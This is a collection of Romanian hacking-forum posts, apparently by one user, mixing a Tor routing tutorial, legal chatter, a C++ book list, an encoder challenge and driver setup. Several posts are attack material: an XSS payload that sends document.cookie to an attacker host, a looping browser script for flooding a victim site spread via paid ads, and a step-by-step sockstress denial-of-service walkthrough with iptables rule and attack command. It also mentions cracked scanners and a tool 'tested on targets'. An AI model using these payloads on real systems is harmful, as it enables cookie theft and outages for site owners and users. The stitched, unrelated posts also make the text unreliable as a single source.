Ganav

In acest tutorial va voi prezenta un mijloc de a ruta tot traficul generat de o statie Windows prin reteaua de anonimizare tor. Aceasta este arhicunoscuta in momentul de fata, atat in comunitatea black hat cat si white hat. Cel mai simplu mod de utilizare este prin descarcarea pachetului tor browser bundle care se gaseste aici: https://www.torproject.org/projects/torbrowser.html.en Implicit browser-ul tor(o versiune firefox care se conecteaza la un SOCKS 5 proxy local, care este de fapt clientul tor) blocheaza continutul fisierelor de tip flash si java. Pentru cei care folosesc Windows exista o alternativa care permite accesul acestor fisiere fara, a pune, insa in joc anonimitatea clientului(a utilizatorului). Trebuie sa descarcam un utilitar Tortilla care se gaseste aici: Community Tools | CrowdStrike Sursele pot fi gasite pe github: https://github.com/CrowdStrike/Tortilla Compilarea acestora necesita Windows Driver Development Kit cu versiunea minima 8.0. In acest tutorial voi folosi installer-ul din motive de claritate. Tortilla este un driver care creaza un Virtual Network Adapter(care este practic o cale prin care datele sunt transmise in retea de la o statie de lucru la alta) si dezactiveaza celelalte Network Adapter-e. Cu alte cuvinte calculatorul are numai un Network Adapter, cel creat de Tortilla. Acesta se conecteaza automat la reteaua de anonimizare tor si ruteaza tot traficul generat de statia respectiva prin aceasta. Tutorialul presupune ca sistemul de operare al statiei gazda(host machine), pe care instalam Tortilla este Windows. In continuare vom avea nevoie de o masina virtuala. Am folosit SunVirtualBox care se gaseste aici: https://www.virtualbox.org/ Acum putem crea un guest(statie de lucru) in masina vituala. Un mod prin care acest lucru se poate realiza este prezentat aici: How to install Windows 7 in VirtualBox [Guide] (@Hatryst) « How-To Geek Forums In exemplul de mai sus s-a instalat un guest cu Windows 7 pe un host cu Windows 7. Systemul de operare al masinii guest poate fi orice distributie de Linux/Windows. Dupa ce am creat statia guest trebuie sa facem o conexiune de tip bridge(o legatura intre doua Network Adapters) intre guest si host. Pe host(statia de lucru principala) ruleaza Tortilla, deci se va folosi Virtual Network Adapter-ul creat de Tortilla. Etapele de instalare sunt descrise mai jos: Lansam in exectuie clientul tor(tor browser bundle) Lansam in executie Tortilla.exe descarcat mai devreme. Putem deschide in paralel si Windows Device Manager pentru a vedea efectiv numele Virtual Network Adapter-ului. Pentru a-l deschide dam click pe Start->My Computer->Right Click->Properties->Device Manager(Windows 7). Deoarece driver-ul nu este semnat de catre Microsoft vom primi un mesaj de avertizare:"Windows can't verify the publisher of this driver software". Ignoram eroarea si trecem pasul urmator Acum din SunVirtualBox selectam masina virtuala guest instalata(in acest caz un Windows 7), dam Right Click->Settings->Network->Attached to: Bridged Adapter. Trebuie sa oprim masina guest pentru a face aceste schimbari. Ulterior repornim sistemul guest. Acum tot traficul din masina guest va fi rulat prin tor Pentru a sterge Tortilla trebuiesc sterse fisierele Tortilla.exe, Tortilla.ini si device driver-ul folosind Windows Service Manager.

Psihologia lor? Par a avea numai nevoi de baza. Vezi piramida lui Maslow: File:Maslow's hierarchy of needs.svg - Wikimedia Commons RST nu are un astfel de titlu. Este acest post motivat de cel de mai devreme(care a fost migrat in cosul de gunoi)? https://rstforums.com/forum/86321-sper-sa-nu-primesc-ban-dar-mor-de-ras.rst

Puteti rula: wget -r http://www.ebooks.shahed.biz/ pentru a descarca intregul director.

Ai putea incepe de aici: https://developer.apple.com/library/iOS/referencelibrary/GettingStarted/RoadMapiOS/index.html Getting Started with iPhone and iOS Development - CodeProject Apple iti impune o taxa la crearea unui cont pe app store: https://itunes.apple.com/en/app/apple-store/id375380948?mt=8 Apple pentru orice aplicatie vanduta iti cotizeaza 30% din valoarea ei. Nu cred ca poti distribui produse gratuite folosind reteaua lor.

Deci este un simplu RAT, nimic mai mult. Nu poate descifra convorbiri telefonice interceptand unde radio(asta ar insemna spargerea algoritmului de criptare(de ex. A5/3) sau gasirea vreunei vulnerabilitati in implementare) si nici nu are capacitatea de a se raspandi.

Nu este chiar asa de veche. L-am postat deoarece inca se poate folosi; ieri l-am testat cu succes pe cateva tinte(firewall-ul nu are implicit setata o regula de filtrare a unor astfel de pachete).

M-am gandit la cum as putea exploata in alte moduri vulnerabilitatile de tip XSS in afara celor "clasice" de tipul: <script> new Image().src="http://siteulnostru.com/index.php?cookies="+encodeURI(document.cookie); </script> unde index.php ne trimite cookie-urile prin e-mail, spre exemplu. Vectorul XSS ar putea arata in felul urmator: <html> <body> <script> while(1) { var img = new Image(); var url = "http://www.victima.com/"; img.src = url; document.body.appendChild(img); } </script> </body> </html> Script-ul de mai sus va face request-uri in continuu, in fundal, atata timp cat victima se gaseste pe pagina respectiva. Am observat, folosind wireshark, ca numarul de request-uri este relativ redus(in medie 5-6 req/s). Se pare ca browsere-le limiteaza numarul de request-uri din motive de performanta. Am observat ca pentru protocolul ftp aceasta limita este mult mai ridicata(in medie 360-370 req/s). Putem modifica vectorul de mai sus in felul urmator: <html> <body> <script> while(1) { var img = new Image(); var url = "ftp://www.victima.com:80/"; img.src = url; document.body.appendChild(img); } </script> </body> </html> Request-urile vor fi redirectionate catre portul 80, deci requestul va fi de tip http in final. Am mai observat ca nu toate site-urile realizeaza acest redirect. Acum ne trebuie un numar cat mai mare de victime care sa viziteze pagina cu vectorul nostru. Avem, in principiu, doua metode: Fie avem un XSS pe un site cu un traffic ridicat(de ex. yahoo.com) Fie investim putin intr-un ad Prima optiune este relativ dificil de exploatat. A doua, insa, este mai accesibila. Putem apela chiar si la un ad provider contra cost: Clicksor Online Advertising Retargeting and Display Advertising | AdRoll Comparire su Kelkoo | Informazioni per shop online Latimea de banda consumata depinde de cat de mult suntem dispusi sa platim.

Acest tutorial prezinta un mod de a realiza un atac de tip DoS(denial-of-service) folosind utilitarul sockstress. sockstress se foloseste de o vulnerabilitatea in implementarea protocolului TCP, si anume etapa de realizare a handshake-ului. In continuare voi descrie pe scurt atat terminologia cat si etapele de realizare a handshake-ului. TCP este un protocol orientat pe conexiune(connection oriented protocol). Acesta presupune ca, inainte de comunicare, fiecare entitate(client/server) cunoaste identitatea interlocutorului sau(clientul cunoaste adresa serverului si invers). In etapa initiala a transferului de date, clientul trimite un pachet cu fanionul SYN setat. SYN este o prescurtare de la SYNCHRONIZE si are rolul de a verifica daca server-ul are o adresa valida, daca asculta pe portul respectiv sau daca este oprit sau nu. In cazul in care adresa nu este valida sau daca server-ul este oprit client-ul asteapta un interval de timp(timeout) dupa care inchide conexiunea. In functie de aplicatie, conexiunea poate fi incercata din nou. Daca serverul este activ si asculta pe portul respectiv acesta trimite un pachet ce are setate fanioanele SYN si ACK. Fanionul ACK este o prescurtare pentru ACKNOWLEDGE si are rolul de a informa clientul ca server-ul a receptionat pachetul initial(cel cu SYN) si transferul poate continua. Acum clientul trimite un pachet doar cu fanionul ACK setat pentru a comunica server-ului receptionarea pachetului SYN/ACK. Dupa aceste etape handshake-ul s-a realizat cu succes iar clientul poate comunica cu serverul. sockstress exploateaza urmatoarea vulnerabilitate: clientul dupa ce a primit pachetul SYN/ACK poate raspunde inapoi server-ului cu un pachet ACK care are dimensiunea ferestrei TCP 0; in aceasta situatie server-ul aloca memorie si asteapta ca un nou pachet ACK sa fie trimis din partea clientului cu dimensiunea ferestrei mai mare ca si zero. Clientul "spune" server-ului ca inca nu a terminat de procesat datele primite anterior. Acum trebuie sa descarcam sockstress. Rulam urmatoarea comanda: git clone https://github.com/defuse/sockstress sockstress Al treilea parametru(sockstress) reprezinta directorul unde dorim sa descarcam sursele. In cazul in care git nu este instalat rulam: sudo apt-get install git Acum compilam sockstress: cd sockstress sudo make sockstress se foloseste de socket-uri de tip raw ce necesita rularea ca r00t(sau UID0). Acum trebuie sa cream o noua regula in iptables care are rolul de a preveni trimiterea pachetelor de tip RST(RESET) ca si raspuns la pachetele SYN/ACK generate de sockstress. Daca sunt trimise pachete RST server-ul nu mai asteapta clientul. Drept urmare, conexiunea este inchisa. Rulam ca r00t: sudo iptables -A OUTPUT -p TCP --tcp-flags rst rst -d xxx.xxx.xxx.xxx -j DROP xxx.xxx.xxx.xxx este adresa victimei. Un exemplu de vector de atac este urmatorul(nu uitati sa specificati regula iptables inainte): sudo ./sockstress 192.168.2.5:80 eth0 L-am testat doar pe Debian/Ubuntu. Este recomandat ca atacul sa fie lansat de pe mai multe statii. Pentru a modifica regula iptables la starea initiala rulam: sudo iptables -A OUTPUT -p TCP --tcp-flags rst rst -d xxx.xxx.xxx.xxx -j ACCEPT

Frumos, acum posteaza un kernel level keylogger sau chiar si unul driver based.

Nu este o solutie fezabila. Nu poti obtine putere mare de calcul cu componente bazate be siliciu(tot te lovesti de power wall). Carbonul este un conductor in anumite aleotropii. Poti indeplini aceleasi functii ca si cu siliciu insa disiparea termica este mult mai scazuta.

Cam acestea ar fi serviciile care sunt scanate: ssh ssdp smtp snmp epmap, loc-srv http 3d-nfsd CrazzyNet sip radmin vnc ms-tem-service netbios-dgm ms-sql-s microsoft-ds mysql domain http-alt telnet ftp cbt, FWTK-authsvr, GodMessage, oracle-portal, TheThing(Modified) NetController, ntp veritas-vis2 ns-server qotd

M-am gandit sa deschid acest thread in scopul de a crea o lista cu diverse utilitare ce pot usura munca unui web pentester. Dupa putin brain storming am creat urmatoarea lista: websecurify https://code.google.com/p/websecurify/ w3af (este inclus in BT5R3, Kali) Acunetix ( este un produs comercial, dar exista numeroase variante crack-uite) HPWebInspect ( comercial, am auzit din mai multe surse ca ar fi cel mai bun, insa nu am avut ocazia sa-l folosesc) sqlmap ( inclus in BT5R3) Havij ( probabil cel mai folosit de catre script kiddies) SQL Inject me & XSS Inject me ( plugin-uri mozilla) Ce alte tool-uri de audit web folositi(in afara de cele din BT, Kali, Firefox Hackbar)?

Am intampinat cateva dificultati la instalarea ultimelor driver-e Nvidia. Acestea se pot descarca aici: Unix Drivers | NVIDIA Eu am folosit: Linux x86_64/AMD64/EM64T Latest Long Lived Branch version: 331.79 Inainte de a incepe instalarea trebuie sa oprim x-server: sudo service lightdm stop sau sudo /etc/init.d/lightdm X-server se ocupa practic cu operatiile intrare/iesire intre aplicatiile instalate pe acel system. Gestioneaza, de asemenea, si mecanismele GUI. O data ce a fost oprit, nu va mai fi afisata decat consola. In cazul meu rezolutia a fost modificata de la 1600x1200 in 800x600 dupa ce l-am oprit. Acum trebuie sa dezinstalam driver-ele nvidia default, instalate o data cu sistemul de operare. Rulam urmatoarea comanda: dpkg -l | grep nvidia Cautam pachetele ce contin numarul versiunii. Acesta trebuie sa fie mai mic decat cel al drivere-lor pe care dorim sa le instalam. In cazul meu este 304.xx < 331.79. Acum trebuie sa dezinstalam pachetele vechim altminteri vor aparea conflicte cu cele noi. In consecinta nu vom mai avea acces decat la consola(X-server nu va putea rula). Rulam urmatoarele comenzi: sudo apt-get autoremove nvidia-304* sudo apt-get --purge remove nvidia-304* Daca totul s-a efectuat cu succes putem incepe instalarea noilor driver-e: navigam in directorul in care am descarcat noul pachet, rulam comanda: chmod +x NVIDIA-Linux-x86_64-331.79.run sudo ./NVIDIA-Linux-x86_64-331.79.run In timpul instalarii puteti specifica daca doriti instalarea pachetului CUDA. CUDA este util daca vreti sa folositi placa grafica pentru a face bruteforcing, mining(cu toate ca nu este foarte rentabil astazi) sau simulari grafice. Dupa instalare trebuie sa restartam statia: sudo shutdown -r now

Mrs. mult. Am vazut ca este un upx.exe in bin . Am cateva idei de a face un crypter insa nu stiu daca timpul imi va permite.

Reply-ul a fost cam neclar. Cunostiintelor mele, li s-au falsificat respectivele acte. Acestea, au intrepatruns actiune juridica si au castigat in instanta. Facebook este doar un site de socializare, un loc unde au fost postate respectivele informatii. Dar un "loc" poate fi si o parcare si un punct turistic in care accesul este public. Daca parchezi masina in oras si cineva face poze, care includ numarul de inmatriculare, si le urca apoi pe un site de socializare poti sa il dai in judecata si ai sanse destul de ridicate sa castigi. O situatie similara ar fi si daca tie, ca persoana, iti face cineva o poza intr-un restaurant, fara acordul tau, iar mai apoi o urca pe facebook in scopul de a te defaima. Tu poti sa il dai in judecata; nu conteaza de unde sau prin ce mijloace a obtinut respectivele imagini.

Nu, nu sunt unul dintre cocalari/pitipoance. Am avut cateva cunostiinte care s-au aflat in situatii similare(fireste, pe motive diferite, nu poze postate pe un site de socializare, ci falsificare de acte de proprietate).

Este bine sa cunosti legea: Lege nr. 677/2001 cu privire la prelucrarea datelor cu caracter personal: Legi internet Lege nr. 677/2001 datele cu caracter personal imi sunt publicate fara acordul meu Pagina 1 - Forum, Avocatnet.ro In domeniul legislativ pot aparea foarte repede complicatii urate care pot duce, in unele situatii, la procese indelungate si costisitoare. Este bine sa le eviti pe cat se poate Articolul nu ia in cosiderare sursele de unde au fost preluate informatiile(facebook ofera posbilitatea de a crea profile private. Reclamantul in cauza poate declara ca nu stia de aceasta functionalitatea sau pur si simplu optiunea nu era valabila(poate inventa orice)).

Problema este, cel putin dupa cum a fost prezentata, ca persoana victimizata ii cunoaste numele, si poate si domiciliul.

Stii ca prin lege este interzisa procurarea si publicarea informatiilor cu caracter personal? Nu ai voie sa faci poze la persoane, actele lor de indentitate, numerele de inmatriculare, etc. fara a primi apriori acordul lor.

Da, omul poate face puscarie. Practic a facut publice informatii cu caracter personal fara a cere acordul persoanelor respective. Depinde si ce a postat si cat de mult a incalcat regulile precizate in termenii de utilizare. Ar putea sterge pagina de tot si sa stea o vreme fara facebook. Cam acestea ar fi cele mai bune alternative in momentul de fata.

Au mai avut ei leak-uri inainte(in acest caz a fost involuntary source code leakage) http://thepiratebay.se/torrent/3497574/Windows_2000_source_code

Reference Style - All Levels A Tour of C++ (Bjarne Stroustrup) The "tour" is a quick (about 180 pages and 14 chapters) tutorial overview of all of standard C++ (language and standard library, and using C++11) at a moderately high level for people who already know C++ or at least are experienced programmers. This book is an extended version of the material that constitutes Chapters 2-5 of The C++ Programming Language, 4th edition. The C++ Programming Language (Bjarne Stroustrup) (updated for C++11) The classic introduction to C++ by its creator. Written to parallel the classic K&R, this indeed reads very much alike it and covers just about everything from the core language to the standard library, to programming paradigms to the language's philosophy. (Thereby making the latest editions break the 1k page barrier.) [Review] The fourth edition (released on May 19, 2013) covers C++11. C++ Standard Library Tutorial and Reference (Nicolai Josuttis) (updated for C++11) The introduction and reference for the C++ Standard Library. The second edition (released on April 9, 2012) covers C++11. [Review] The C++ IO Streams and Locales (Angelika Langer and Klaus Kreft) There's very little to say about this book except that, if you want to know anything about streams and locales, then this is the one place to find definitive answers. [Review] C++11 References: The C++ Standard (INCITS/ISO/IEC 14882-2011) This, of course, is the final arbiter of all that is or isn't C++. Be aware, however, that it is intended purely as a reference for experienced users willing to devote considerable time and effort to its understanding. As usual, the first release was quite expensive ($300+ US), but it has now been released in electronic form for $60US Overview of the New C++ (C++11/14) (PDF only) (Scott Meyers) (updated for C++1y/C++14) These are the presentation materials (slides and some lecture notes) of a three-day training course offered by Scott Meyers, who's a highly respected author on C++. Even though the list of items is short, the quality is high. Beginner Introductory If you are new to programming or if you have experience in other languages and are new to C++, these books are highly recommended. C++ Primer * (Stanley Lippman, Josée Lajoie, and Barbara E. Moo) (updated for C++11) Coming at 1k pages, this is a very thorough introduction into C++ that covers just about everything in the language in a very accessible format and in great detail. The fifth edition (released August 16, 2012) covers C++11. [Review] Accelerated C++ (Andrew Koenig and Barbara Moo) This basically covers the same ground as the C++ Primer, but does so on a fourth of its space. This is largely because it does not attempt to be an introduction to programming, but an introduction to C++ for people who've previously programmed in some other language. It has a steeper learning curve, but, for those who can cope with this, it is a very compact introduction into the language. (Historically, it broke new ground by being the first beginner's book using a modern approach at teaching the language.) [Review] Thinking in C++ (Bruce Eckel) Two volumes; second is more about standard library, but still very good Programming: Principles and Practice Using C++ (Bjarne Stroustrup) (updated for C++11/C++14) An introduction to programming using C++ by the creator of the language. A good read, that assumes no previous programming experience, but is not only for beginners. * Not to be confused with C++ Primer Plus (Stephen Prata), with a significantly less favorable review. Best practices Effective C++ (Scott Meyers) This was written with the aim of being the best second book C++ programmers should read, and it succeeded. Earlier editions were aimed at programmers coming from C, the third edition changes this and targets programmers coming from languages like Java. It presents ~50 easy-to-remember rules of thumb along with their rationale in a very accessible (and enjoyable) style. [Review] Effective STL (Scott Meyers) This aims to do the same to the part of the standard library coming from the STL what Effective C++ did to the language as a whole: It presents rules of thumb along with their rationale. [Review] Intermediate More Effective C++ (Scott Meyers) Even more rules of thumb than Effective C++. Not as important as the ones in the first book, but still good to know. Exceptional C++ (Herb Sutter) Presented as a set of puzzles, this has one of the best and thorough discussions of the proper resource management and exception safety in C++ through Resource Acquisition is Initialization (RAII) in addition to in-depth coverage of a variety of other topics including the pimpl idiom, name lookup, good class design, and the C++ memory model. [Review] More Exceptional C++ (Herb Sutter) Covers additional exception safety topics not covered in Exceptional C++, in addition to discussion of effective object oriented programming in C++ and correct use of the STL. [Review] Exceptional C++ Style (Herb Sutter) Discusses generic programming, optimization, and resource management; this book also has an excellent exposition of how to write modular code in C++ by using nonmember functions and the single responsibility principle. [Review] C++ Coding Standards (Herb Sutter and Andrei Alexandrescu) "Coding standards" here doesn't mean "how many spaces should I indent my code?" This book contains 101 best practices, idioms, and common pitfalls that can help you to write correct, understandable, and efficient C++ code. [Review] C++ Templates: The Complete Guide (David Vandevoorde and Nicolai M. Josuttis) This is the book about templates as they existed before C++11. It covers everything from the very basics to some of the most advanced template metaprogramming and explains every detail of how templates work (both conceptually and at how they are implemented) and discusses many common pitfalls. Has excellent summaries of the One Definition Rule (ODR) and overload resolution in the appendices. A second edition is scheduled for 2015. [Review] Advanced Modern C++ Design (Andrei Alexandrescu) A groundbreaking book on advanced generic programming techniques. Introduces policy-based design, type lists, and fundamental generic programming idioms then explains how many useful design patterns (including small object allocators, functors, factories, visitors, and multimethods) can be implemented efficiently, modularly, and cleanly using generic programming. [Review] C++ Template Metaprogramming (David Abrahams and Aleksey Gurtovoy) C++ Concurrency In Action (Anthony Williams) A book covering C++11 concurrency support including the thread library, the atomics library, the C++ memory model, locks and mutexes, as well as issues of designing and debugging multithreaded applications. Advanced C++ Metaprogramming (Davide Di Gennaro) A pre-C++11 manual of TMP techniques, focused more on practice than theory. There are a ton of snippets in this book, some of which are made obsolete by typetraits, but the techniques, are nonetheless, useful to know. If you can put up with the quirky formatting/editing, it is easier to read than Alexandrescu, and arguably, more rewarding. For more experienced developers, there is a good chance that you may pick up something about a dark corner of C++ (a quirk) that usually only comes about through extensive experience. Classics / Older Note: Some information contained within these books may not be up-to-date or no longer considered best practice. The Design and Evolution of C++ (Bjarne Stroustrup) If you want to know why the language is the way it is, this book is where you find answers. This covers everything before the standardization of C++. Ruminations on C++ - (Andrew Koenig and Barbara Moo) [Review] Advanced C++ Programming Styles and Idioms (James Coplien) A predecessor of the pattern movement, it describes many C++-specific "idioms". It's certainly a very good book and still worth a read if you can spare the time, but quite old and not up-to-date with current C++. Large Scale C++ Software Design (John Lakos) Lakos explains techniques to manage very big C++ software projects. Certainly a good read, if it only was up to date. It was written long before C++98, and misses on many features (e.g. namespaces) important for large scale projects. If you need to work in a big C++ software project, you might want to read it, although you need to take more than a grain of salt with it. There's been the rumor that Lakos is writing an up-to-date edition of the book for years. Inside the C++ Object Model (Stanley Lippman) If you want to know how virtual member functions are commonly implemented and how base objects are commonly laid out in memory in a multi-inheritance scenario, and how all this affects performance, this is where you will find thorough discussions of such topics. Sursa: c++ faq - The Definitive C++ Book Guide and List - Stack Overflow

In urma cu cateva zile am creat un challenge in care se dorea aflarea textului in clar al unui sir de caractere codate: https://rstforums.com/forum/85978-encode-decode.rst Pana acum nu am primit niciun raspuns in privinta unei rezolvari sau chiar si a vreunei idei de rezolvare. Drept urmare m-am gandit sa fac publica sursa encoder-ului. A fost scris in Visual C++ Express Edition 2010 care poate fi gasit aici: Download Overview Deschideti Visual Studio si creati un proiect nou de tip consola. La sfarsit inainte de a da click pe Finish asigurati-va ca proiectul nu va folosi antete precompilate(Precompiled headers). Acum creati urmatoarele fisiere antet(Acestea trebuiesc situate in folder-ul "Header Files" vizibil in Project Explorer): includes.h #ifndef INCLUDES_H #define INCLUDES_H #include <iostream> #include <string> #include <algorithm> #include <utility> #include <vector> #include <fstream> #endif encoder.h #ifndef ENCODER_H #define ENCODER_H #include "includes.h" class Char4EncoderDecoder { private: char getEncodedChar(int c); int getDecodedChar(char c); void reverseStr(std::vector<unsigned char>& input) { std::reverse(input.begin(), input.end()); } void bitReverse(std::vector<unsigned char>& input); void oddSwap(std::vector<unsigned char>& input); void evenSwap(std::vector<unsigned char>& input); void formatInput(std::vector<unsigned char>& input); void Char4EncoderDecoder::XORConsecutiveBytePairsInv(std::vector<unsigned char>& input); void write2dst(std::vector<unsigned char>& dst, std::string& fin_dst); public: void encode(std::string& src, std::string& dst); void decode(std::string& src, std::string& dst); }; #endif Acum ne trebuiesc fisierele sursa(unde sunt implementate metodele claselor din fisierele antet). Adaugam in folderul "Source Files" din Project Explorer urmatoarele fisiere: encoder.cpp #include "includes.h" #include "encoder.h" void Char4EncoderDecoder::bitReverse(std::vector<unsigned char>& input) { for(size_t i = 0; i < input.size(); i++) input[i] = (input[i] * 0x0202020202ULL & 0x010884422010ULL) % 1023; } void Char4EncoderDecoder::oddSwap(std::vector<unsigned char>& input) { for(size_t i = 0; i < input.size() / 2; i++) if(input[i] % 2) { input[i] ^= input[input.size()/2+i]; input[input.size()/2+i] ^= input[i]; input[i] ^= input[input.size()/2+i]; } } void Char4EncoderDecoder::evenSwap(std::vector<unsigned char>& input) { for(size_t i = 0; i < input.size() / 2; i++) if(input[i] % 2 == 0) { input[input.size()/2+i] ^= input[i]; input[i] ^= input[input.size()/2+i]; input[input.size()/2+i] ^= input[i]; } } void Char4EncoderDecoder::encode(std::string& src, std::string& dst) { std::vector<unsigned char> byte_dst(src.begin(), src.end()); dst.clear(); // Reverse the source string this->reverseStr(byte_dst); // Bit reverse the source string this->bitReverse(byte_dst); // Swap even this->evenSwap(byte_dst); // Odd swap this->oddSwap(byte_dst); write2dst(byte_dst, dst); } void Char4EncoderDecoder::decode(std::string& src, std::string& dst) { std::vector<unsigned char> byte_dst(src.begin(), src.end()); dst.clear(); // Format input into bytes formatInput(byte_dst); // Odd swap this->oddSwap(byte_dst); // Swap even this->evenSwap(byte_dst); // Bit reverse the source string this->bitReverse(byte_dst); // Reverse the source string this->reverseStr(byte_dst); dst.resize(byte_dst.size()); for(size_t i = 0; i < byte_dst.size(); i++) dst[i] = byte_dst[i]; } void Char4EncoderDecoder::formatInput(std::vector<unsigned char>& input) { // Format input if(input.size() % 4 != 0) { size_t aux = input.size() % 4; for(size_t i = 0; i < aux; i++) input.push_back('['); } // Extract bits and create results vector std::vector<unsigned char> dst; dst.resize(input.size() / 4); for(size_t i = 0; i < input.size(); i += 4) { dst[i/4] |= getDecodedChar(input[i]); dst[i/4] |= getDecodedChar(input[i+1]) << 2; dst[i/4] |= getDecodedChar(input[i+2]) << 4; dst[i/4] |= getDecodedChar(input[i+3]) << 6; } input = dst; } int Char4EncoderDecoder::getDecodedChar(char c) { if(c == '[') return 0; else if(c == '<') return 1; else if(c == '>') return 2; else if(c == ']') return 3; else return -1; } char Char4EncoderDecoder::getEncodedChar(int c) { if(c == 0) return '['; else if(c == 1) return '<'; else if(c == 2) return '>'; else if(c == 3) return ']'; else return -1; } void Char4EncoderDecoder::write2dst(std::vector<unsigned char>& dst, std::string& fin_dst) { std::vector<unsigned char> tmp_dst; for(size_t i = 0; i < dst.size(); i++) { tmp_dst.push_back(getEncodedChar((int)dst[i] & 0x03)); tmp_dst.push_back(getEncodedChar((int)(dst[i] & 0x0c) >> 2)); tmp_dst.push_back(getEncodedChar((int)(dst[i] & 0x30) >> 4)); tmp_dst.push_back(getEncodedChar((int)(dst[i] & 0xC0) >> 6)); } fin_dst.clear(); fin_dst.resize(tmp_dst.size()); for(size_t i = 0; i < tmp_dst.size(); i++) fin_dst[i] = tmp_dst[i]; // std::cin.get(); } main.cpp #include "includes.h" #include "encoder.h" void challengeRST(void) { Char4EncoderDecoder *enc = 0; std::string src, dst; std::ofstream f; f.open ("RST_out.txt"); enc = new Char4EncoderDecoder(); src = "RST Forums"; enc->encode(src, dst); std::cout << "Encoded value: " << dst << "\n"; enc->decode(dst, src); std::cout << "Decoded value: " << src << "\n"; src = "abc"; enc->encode(src, dst); std::cout << "Encoded value: " << dst << "\n"; f << "Encoded value: " << dst << "\n"; enc->decode(dst, src); std::cout << "Decoded value: " << src << "\n"; f << "Encoded value: " << src << "\n"; src = "abc123"; enc->encode(src, dst); std::cout << "Encoded value: " << dst << "\n"; f << "Encoded value: " << dst << "\n"; enc->decode(dst, src); std::cout << "Decoded value: " << src << "\n"; f << "Encoded value: " << src << "\n"; src = "The quick brown fox jumps over the lazy dog"; enc->encode(src, dst); std::cout << "Encoded value: " << dst << "\n"; f << "Encoded value: " << dst << "\n"; enc->decode(dst, src); std::cout << "Decoded value: " << src << "\n"; f << "Encoded value: " << src << "\n"; src = "Romanian Security Team 2006 - 2014"; enc->encode(src, dst); std::cout << "Encoded value: " << dst << "\n"; f << "Encoded value: " << dst << "\n"; enc->decode(dst, src); std::cout << "Decoded value: " << src << "\n"; f << "Encoded value: " << src << "\n"; std::cout << "Done\n"; std::cin.get(); delete enc; enc = 0; f.close(); } void usage(char *argv) { std::cout << "Usage: " << argv << "<-e/-d> <to be encoded string> \n"; std::exit(0); } int main(int argc, char **argv) { #ifndef NDEBUG challengeRST(); #else if(argc != 3) usage(argv[0]); Char4EncoderDecoder *enc = 0; enc = new Char4EncoderDecoder(); std::string ed("argv[1]"); std::string src("argv[2]"); std::string dst; if(ed == "-e") { enc->encode(src, dst); std::cout << "Encoded string: " << dst << "\n"; } else if(ed == "-d") { enc->decode(src, dst); std::cout << "Decoded string: " << dst << "\n"; } else { usage(argv[0]); } // Deallocate memory delete enc; enc = 0; #endif return 0; } Algoritmul poate fi dezvoltat in continuare adaugand mai multe etape de procesare.

Majoritatea filmuletelor de pe yt sunt tepe. Nu, nu este real. In momentul de fata un bitcoin valoreaza foarte mult, nimeni nu face public ceva ce poate genera bitcoin instant. Nu te apuca de minat decat daca ai ASIC-uri, mineritul prin GPU nu mai renteaza astazi.

Ai dreptate in legatura cu boost. Este dificil de invat dar este C++ pur. Iti trebuie un efort initial dupa care poti scrie orice module in mult mai putine linii de cod decat daca le-ai dezvolta de la zero. Poti apela si la clase proprii insa este dificil sa prevezi toate situatiile ce pot surveni, sa nu mai spunem de organizarea acestora. Am incercat, la inceput sa imi fac o suita de clase, insa gradul de abstractizare era foarte ridicat(trebuia sa investesc foarte mult timp in design, in functionalitatea si chiar utilitatea lor(am scris unele clase care acum sunt stub-uri si nu le mai folosesc nicaieri)).